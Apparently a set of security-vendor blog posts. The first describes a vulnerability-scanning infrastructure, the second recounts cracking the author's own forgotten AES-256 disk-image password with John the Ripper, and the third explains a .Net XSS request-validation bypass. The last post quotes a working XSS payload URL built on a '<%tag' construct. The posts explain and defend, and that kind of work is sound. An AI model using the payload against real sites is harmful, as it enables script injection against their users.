For efficiency, Sentinel’s infrastructure must be smart enough to automatically provision Scan Servers and Reporting Servers. To accomplish this we leverage virtualization on top of several clusters of blade chassis, which allow us to control resource allocation between multiple scanning instances and load-balanced front-end & back-end reporting Web servers. As new scans kick off, as defined by their schedule, Scan Servers dynamically appear to handle the load. We’ve had as many as 64 Scan Servers running at once. As scans taper off, unnecessary Scan Servers vanish, freeing up their CPU / memory resources for the Reporting Servers. When we need additional server capacity, we add additional blades or an entire new blade chassis.

Next we could describe all the various networking gear, routers, switches, and firewalls, which bind everything together. The reality is we’re not comfortable sharing out that information publicly. What we can say is the entirety of the system passed a BITS/ISO27002 Shared Assessment compliance audit. Beyond that, you’ll need to sign a non-disclosure agreement.

It’s safe to say the Sentinel infrastructure is rather sophisticated and contains a lot of moving parts. All told, our IT team monitors 162 hosts and over 1,300 services in production. They keep a close eye on utilization of network, CPU, memory, uptime, latency, etc., ensuring everything runs smoothly 24 hours a day, 7 days a week, 365 days a year. With rare exception, Sentinel’s entire infrastructure is redundant. Pull any network cable, push any power button, and the system keeps hacking away, so to speak.

All of this heavy metal is connected together via dual 10GB backplane Ethernet and housed in 5 fully utilized 42U racks (expanding into racks 6 and 7 shortly). Since the data we’re responsible for is highly sensitive, to say the least, the racks are physically located in an SSAE16 SOC 1, and soon to be FedRAMP certified, state-of-the-art colocation facility. At the Colo, security guards are always onsite. Then there are digital video recorders, false entrances, vehicle blockades, bulletproof glass/walls, unmarked buildings, and person-traps authenticating only one person at a time. Access to our cage requires an appointment, government-issued ID, biometric scan, and only then do they hand over the key.

Building the Sentinel infrastructure has taken us years, millions and millions of dollars, countless all-nighters, and precious hair follicles. It is something we’re extremely proud of and confident in. Nothing else like it, or even close to it, exists. And it’s always getting better, always being improved upon. When your mission is scanning every website on the Internet for vulnerabilities, making them measurably more secure, such a physical infrastructure is just one of the things you need. When we say “scalable,” this is what we mean.

 

 

Password Cracking AES-256 DMGs and Epic Self-Pwnage

Two weeks ago I was in the midst of a nightmare. I’d forgotten a password. Not just any password. THE password. Without this one password I was cryptographically locked out of thousands of files, gigabytes’ worth, that I care about. Highly sensitive and valuable files that include work documents, personal projects, photos, code snippets, notes, family stuff, etc. The password in question unlocks these files from the protection of a locally stored AES-256 encrypted disk image. A location where an “email me a password reset link” is not an option. File backups? Of course! Encrypted the same way with the same password. Password paper backup? Nope. I’ll get to that. I somehow needed to “crack” this password. If not, the amount of epic self-pwnage would be too horrible to imagine.

Before sharing how I got myself into this predicament, it’s necessary to reveal some details about my personal computer security habits. More specifics than I’m normally comfortable sharing.

As my badge wall shows, I travel a lot, all around the world, and often with the same laptop. A MacBook Pro. My computer becoming lost, stolen, or imaged by border guards and other law enforcement officers is a constant concern. To protect against these potential physical attacks, OS X dutifully offers FileVault.

FileVault is a full disk encryption feature utilizing XTS-AES 128 crypto. Enabling FileVault means that even if someone has physical possession of my computer, or obtains a full copy of the hard drive, they’d be the proud new owner of a cutting-edge machine, but unable to get any useful data off of it. That is unless my admin password, which unlocks FileVault, is ridiculously simple, and it isn’t. By all practical means, “cracking” this password is impossible.

What is possible is law enforcement, or a robber, forcibly stopping me and “asking” for my admin password, a method capable of defeating FileVault’s full disk encryption. Realistically, while my Brazilian jiu-jitsu black belt certainly helps in many situations, it can be utterly useless in other real-world encounters. I’ll of course resist giving up my admin password to the extent I’m able, but must assume I may have to “comply” at some point. If this should happen, ideally my data, other than email, should remain safe even after the adversary lands on my desktop.

Setting up this type of layered security fall-back plan is where we return to the conversation of encrypted disk images. On OS X, Disk Utility can be used to create encrypted disk images called DMGs. DMGs are self-contained portable files, of customizable size, that when mounted (i.e. double-clicked) display on the desktop like any other disk drive where files can be stored.

Upon creation of DMGs the level of encryption strength can be set, the highest being AES-256. If FileVault’s AES-128 crypto is already “impossible” to crack, AES-256 DMGs are exponentially more impossible. To ensure this, all you have to do is set a reasonable password. We’re talking even 6 characters or longer, some upper and lower case, and maybe toss in a digit and special character. DON’T SAVE THE PASSWORD IN YOUR KEYCHAIN. Doing so defeats the entire purpose of what we’re trying to accomplish, because the admin password unlocks the keychain.

A great thing about DMGs is that they can be stored anywhere. Hidden in some obscure directory on the local machine, a network storage device, a USB drive, whatever. All my confidential files are typically stored this way, in a series of encrypted DMGs with separate passwords. Also very important, DMGs containing sensitive files are only mounted on an as-needed basis. This is for two reasons:

  1. If I must hand over my admin password, the person now on the desktop should still have a difficult time learning these disk images exist and a password is required to open them. As they begin to snoop around, image the drive, run forensics, etc., they should feel they have the keys to the kingdom. If they do manage to find the DMGs, hopefully by then I’m on my way and seeking legal help.
  2. Should my computer get “hacked,” a remote attacker will find it extremely difficult to transfer out many, many gigabytes worth of data as a single DMG file before being noticed, before the computer loses its connection to the Internet, or before the image is unmounted.

security

Credit: http://xkcd.com/

What’s also cool is a DMG can be used to store additional account passwords, flat file style. Passwords, which can be made super strong and don’t have to be committed to memory. Simply copy-paste as necessary. This FileVault / DMG setup makes it very convenient to only have to remember a small handful of passwords, including the admin password, to access everything important and without sacrificing security. Well, convenient up until the point where you forget a DMG password. In my case, caused by my scheduled ritual of “change all my passwords.” Ugh!

I wake up once upon a recent morning and begin my daily routine. Check calendar. Check email. Check RSS. Check Twitter. Start working, start reading. As is common, I mount a DMG and am greeted by the familiar password dialog. First password attempt, fail. Second attempt, fail. Third attempt, fail. Warning dialog appears. That’s weird, I thought. Normally I’m a proficient touch typist. Am I fat-fingering the password? Three strikes and I’m out again.

Annoyed, but not concerned. Check the caps lock key. Nope. Try the password again. Fail, fail, fail. Fail, fail, fail. Rinse, repeat several more times. WTF! Am I at least trying to type the correct password for the DMG? I believe so. Let me try a few “shouldn’t work passwords” just in case Morning Brain is causing problems. A few dozen password fails later, annoyance begins constricting into panic. It’s OK, consoling myself, I’ll come back to this in a little while. It’ll be fine. I have some non-DMG-required work to complete anyway.

An hour later, I repeated the same password attempt cycle. No dice. The password fails mounting up are now in the hundreds. I start to mouth some obscenities and my keyboard is really not liking the pounding. My wife is beginning to eyeball me with concern. I’m running out of ideas of what the problem could be. That’s about when I recalled recently changing all my passwords. A few moments later, that’s when it hit me, like really hit me. For whatever reason, I’d forgotten what I changed the password to. *Gulp*. Oh, no!

password_strength

Credit: http://xkcd.com/

Think positive, think optimistic. Keep calm. Carry on. It’ll come to me. I’ve never forgotten these passwords before. I even remember most of it. At least, I think I do.

I’m periodically trying different passwords throughout the day, throughout the evening. One day turns into two, two into three. All like the first. Only now I’m losing sleep. I’m waking up in the middle of the night and have to try a few more passwords just so I can get back to sleep. For those who don’t know, dreaming of password combinations sucks. What also sucks is without access to this DMG, more specifically the work documents within it, my daily productivity plummets.

Finally, after nearly a week I have to admit to myself, I forgot it. That I’m in trouble. Time for Plan B. Google.

I begin searching around for DMG password cracking tools. My thought is since I have a partial password, I should be fine. Most of the results pages are littered with people responding by cracking jokes when asked about cracking DMG AES crypto. That’s not very encouraging. Then I come across something called crowbarDMG, which is basically a GUI for the command:

>$ hdiutil attach -passphrase <passphrase> DiskImage.dmg 

hdiutil locks a DMG file when attempting to mount it, so crowbarDMG runs single threaded, which essentially means a cracking speed of 1 c/s (one candidate password per second). Yeah, slow. For my particular circumstance, this was fine. I figured I was only missing between 1 and 3 characters of the password anyway. A day of cracking, maybe two, and I’d be back in business. It was not to be. Then my fuzzy memory suggested I might be missing as many as 6 characters. If that be the case, by sheer math, at least multiple decades worth of cracking would be necessary at current speed. Time for Plan C. Twitter.
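For a rough feel of the math behind that estimate, here is a minimal sketch of how the search space grows with the number of unknown characters. The character-set sizes are illustrative assumptions (the post does not say which characters were in play), and the only figure taken from the text is the rate of roughly 1 c/s.

```python
# Back-of-the-envelope estimate of exhaustive-search time when some
# characters of a password are unknown. Character-set sizes below are
# assumptions for illustration, not the author's actual password rules.

SECONDS_PER_HOUR = 60 * 60
SECONDS_PER_DAY = 24 * SECONDS_PER_HOUR
SECONDS_PER_YEAR = 365 * SECONDS_PER_DAY


def keyspace(charset_size: int, unknown_chars: int) -> int:
    """Number of candidates when `unknown_chars` positions are unknown."""
    return charset_size ** unknown_chars


def seconds_to_exhaust(candidates: int, rate_per_second: float) -> float:
    """Worst-case time to try every candidate at a fixed guess rate."""
    return candidates / rate_per_second


def humanize(seconds: float) -> str:
    """Format a duration in the largest sensible unit."""
    if seconds < SECONDS_PER_DAY:
        return f"{seconds / SECONDS_PER_HOUR:.1f} hours"
    if seconds < SECONDS_PER_YEAR:
        return f"{seconds / SECONDS_PER_DAY:.1f} days"
    return f"{seconds / SECONDS_PER_YEAR:.1f} years"


if __name__ == "__main__":
    rate = 1.0  # ~1 c/s, the single-threaded hdiutil speed quoted above
    charsets = [("lowercase", 26), ("mixed case", 52), ("mixed case + digits", 62)]
    for label, size in charsets:
        for unknown in (3, 6):
            total = keyspace(size, unknown)
            worst = humanize(seconds_to_exhaust(total, rate))
            print(f"{label:20s} {unknown} unknown: {total:>15,d} candidates, {worst}")
```

Under these assumed character sets, three unknown lowercase letters take about five hours at 1 c/s, while six unknown mixed-case letters take roughly 627 years.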

Having ~15,000 followers interested in computer security has its perks. Through the years I’ve come to expect a good percentage of them have a stinging sense of humor. Similar to the Google search, 99% of the responses received were sarcastic. This included one such retort from a friend who works in law enforcement computer forensics. I’m sure some tweets were funny, but I was in no laughing mood. I was freaked. A sense of futility and finality was setting in.

That was until Solar Designer, gat3way, Dhiru Kholia, and Magnum, the guys behind the infamous John the Ripper (JtR) password cracker, answered my plea. Then Jeremi Gosney of Stricture Consulting Group graciously offered up the use of his mega hash cracking computing resources as well. You remember Stricture from their Ars article, they have an insane “25-GPU cluster cracks every standard Windows password in < 6 hours.” Collectively, these guys are amongst the world’s foremost experts in password cracking. If they can’t help, no one can. No joking around, they immediately dove right in.

Now, I couldn’t just share out my DMG for others to attempt to crack. Its enormous size basically precluded that. But even if I could, I wouldn’t. Given the sensitive nature of the data, I would actually rather lose the data than suffer any risk of a leak. Fortunately, JtR has something called dmg2john. dmg2john scrapes the DMG and provides output which can be cracked with JtR by others without putting the data at risk. Nice! Unfortunately, when I got there, dmg2john and JtR were broken when it came to DMGs. I provided the bug details to the john-dev and john-users mailing lists so the problem could be replicated. The JtR developers had the issues fixed in a couple of days. These guys are awesome.

Next step, send the dmg2john output of my DMG over to Jeremi at Stricture along with everything I think I remember about what my password might have been. Jeremi informs me of the next challenge: he’s only able to crack my DMG at a speed of ~100 c/s! At that rate it’s going to take a little over a decade worth of cracking to exhaust the password key space. I’m thinking this is very odd, it’s only maybe 6 extra characters tops. Jeremi explains why…

The reason it’s so slow is because your AES256-encrypted DMG uses 250,000 rounds of PBKDF2-HMAC-SHA-1 to generate the encryption key. The ludicrous round count makes it extremely computationally expensive, slowing down the HMAC-SHA1 process by a factor of 250,000.

My Xeon X7350 can crack a single round of HMAC-SHA1 at a rate of 9.3 million hashes per second. But since we are using 250,000 rounds, it means I was reduced to doing ~ 37 hashes per second. Using all four processors I was only able to pull about 104 hashes per second total (doesn’t scale perfectly.)
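To make Jeremi’s arithmetic concrete, the sketch below uses Python’s standard `hashlib.pbkdf2_hmac` to show what an iterated key derivation looks like and why the round count divides the guess rate. The 250,000 rounds and the 9.3 million hashes per second come from his explanation; the password, salt, and 32-byte output length are placeholders chosen for illustration and are not the DMG format’s real parameters.

```python
import hashlib
import time

ROUNDS = 250_000           # iteration count quoted above
SINGLE_ROUND_RATE = 9.3e6  # HMAC-SHA1 hashes/second on one processor, as quoted


def derive_key(password: bytes, salt: bytes,
               rounds: int = ROUNDS, length: int = 32) -> bytes:
    """Derive a key with PBKDF2-HMAC-SHA1 (salt and length are placeholders)."""
    return hashlib.pbkdf2_hmac("sha1", password, salt, rounds, dklen=length)


def guesses_per_second(single_round_rate: float, rounds: int) -> float:
    """Each password guess costs `rounds` HMAC operations, so the rate divides."""
    return single_round_rate / rounds


if __name__ == "__main__":
    rate = guesses_per_second(SINGLE_ROUND_RATE, ROUNDS)
    print(f"Estimated guesses per second on one processor: {rate:.1f}")

    # Time one real derivation on this machine to feel the cost of a single guess.
    start = time.perf_counter()
    derive_key(b"example password", b"example salt")
    elapsed = time.perf_counter() - start
    print(f"One {ROUNDS:,}-round derivation took {elapsed:.3f} s here")
```

The division gives about 37 guesses per second, matching the figure in the quote. The timing printed at the end depends entirely on the machine running it.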

Once he understood this, Jeremi began asking for more information about what the extra six or so characters in my password might have been. Were they all upper and lower case characters? What about digits? Any special characters? Which characters were most likely used, or not used? Every bit of intel helped a lot. We managed to whittle down an initial 41,106,759,720 possible password combinations to 22,472. This meant the total amount of time required to crack the DMG was reduced to 3.5 minutes on his rig.
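The whittling-down described above is essentially a mask: for each unknown position, list only the characters that could plausibly appear there, and the number of candidates becomes the product of those list sizes. The sketch below is a hypothetical illustration of that idea. The example prefix and mask are invented, and only the two candidate counts and the ~104 hashes per second come from the post.

```python
from itertools import product
from math import prod

RATE = 104  # hashes per second, the four-processor figure quoted above
SECONDS_PER_YEAR = 365 * 24 * 60 * 60


def mask_keyspace(mask):
    """Candidates for a mask: the product of the per-position choices."""
    return prod(len(choices) for choices in mask)


def candidates(prefix, mask):
    """Yield every password formed by the known prefix plus one choice per position."""
    for combo in product(*mask):
        yield prefix + "".join(combo)


def seconds_to_exhaust(count, rate=RATE):
    """Worst-case time to try `count` candidates at `rate` guesses per second."""
    return count / rate


if __name__ == "__main__":
    # Hypothetical mask: two positions limited to a few letters, one to digits.
    example_mask = ["aeiou", "stn", "0123456789"]
    print(mask_keyspace(example_mask), "candidates, e.g.",
          next(candidates("known-part-", example_mask)))

    # The two counts reported in the post, at the quoted rate.
    print(f"{seconds_to_exhaust(41_106_759_720) / SECONDS_PER_YEAR:.1f} years before")
    print(f"{seconds_to_exhaust(22_472) / 60:.1f} minutes after")
```

At 104 guesses per second the original count works out to roughly twelve and a half years and the reduced one to about three and a half minutes, in line with the “little over a decade” and “3.5 minutes” figures in the text.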

Subsequently, Jeremi sent me what had to be one of the most relieving and frightening emails I’ve ever received in my life. Relieving because I recognized the password immediately upon sight. I knew it was right, but my anxiety level remained at 10 until typing it in and seeing it work. I hadn’t touched my precious data in weeks! It was a tender moment, but also frightening because, well, no security professional is ever comfortable seeing such a prized password emailed to them from someone else. When/if that happens, it typically means you are hacked and another pain awaits.

Interestingly, in living out this nightmare, I learned A LOT I didn’t know about password cracking, storage, and complexity.  I’ve come to appreciate why password storage is ever so much more important than password complexity. If you don’t know how your password is stored, then all you really can depend upon is complexity. This might be common knowledge to password and crypto pros, but for the average InfoSec or Web Security expert, I highly doubt it.

Now, after telling everyone a few of my best tricks and enduring an awful deficiency in one of them, I’ll obviously have to change things up a bit. Clearly I need a paper backup, and I’m thinking about maybe giving it to my attorney for safekeeping, where it’ll enjoy legal privilege protection. We’ll see.

In the meantime, I can’t thank the John the Ripper guys and Jeremi from Stricture Consulting enough. If you need a password cracked, for personal or professional reasons, this is where to look.

 

 

By the Website Vulnerability Numbers: .Net XSS Request Validation Bypass

There are a million variations of Cross-Site Scripting (XSS), some more interesting than others. Back in August 2012 a post entitled, “.Net Cross Site Scripting – Request Validation Bypassing,” from Quotium caught our eye. The filter-bypass technique they described looked extremely trivial, only a single % character was necessary, but it worked all the same.

“This is caused by the fact that although ‹tag› is restricted by the Request Validation filter, ‹%tag› is not restricted but parsed by Internet Explorer browsers as a valid tag.

http://www.vulnerablesite.com/login.aspx?param=‹%tag style=”xss:expression(alert(123))” ›
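As a rough illustration of why a single % slips through, the sketch below models a filter that rejects a left angle bracket only when a tag-like character follows it. This rule is a simplifying assumption made for the example and is not Microsoft’s actual Request Validation code. The payload uses ASCII angle brackets and straight quotes in place of the typographic characters shown above. The last function shows one common defense, HTML-encoding the value on output with Python’s standard `html.escape`.

```python
import html
import re

# Simplified stand-in for a "dangerous markup" filter: flag "<" only when it
# is immediately followed by a letter, "!", "/" or "?". This rule is an
# assumption for illustration, not the real Request Validation logic.
NAIVE_TAG_START = re.compile(r"<[A-Za-z!/?]")


def naive_filter_blocks(value: str) -> bool:
    """Return True if the simplified filter would reject the input."""
    return NAIVE_TAG_START.search(value) is not None


def encode_for_html(value: str) -> str:
    """Output-encode untrusted input so the browser never sees raw markup."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    plain = '<tag style="xss:expression(alert(123))">'
    bypass = '<%tag style="xss:expression(alert(123))">'

    print(naive_filter_blocks(plain))   # the ordinary tag is caught
    print(naive_filter_blocks(bypass))  # the % variant is not
    print(encode_for_html(bypass))      # encoded output contains no raw "<"
```

The point of the sketch is that a blocklist keyed on what follows the bracket can be sidestepped by any character the browser tolerates but the filter ignores, whereas encoding on output does not depend on guessing those characters.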

The other notable point was that for some reason, which may be entirely reasonable, Microsoft opted to NOT address the issue. .Net developers are advised that they must provide adequate defense on their own.

At WhiteHat Security, a big part of our job is helping them do exactly that. Our research team added checks to WhiteHat Sentinel to identify this XSS variant. In the months since, we scanned 10,000+ websites and waited to see if anything turned up. So far, we’ve identified exactly 20 websites that are vulnerable to this specific issue. Not a huge number in terms of percentage of websites, but there it is.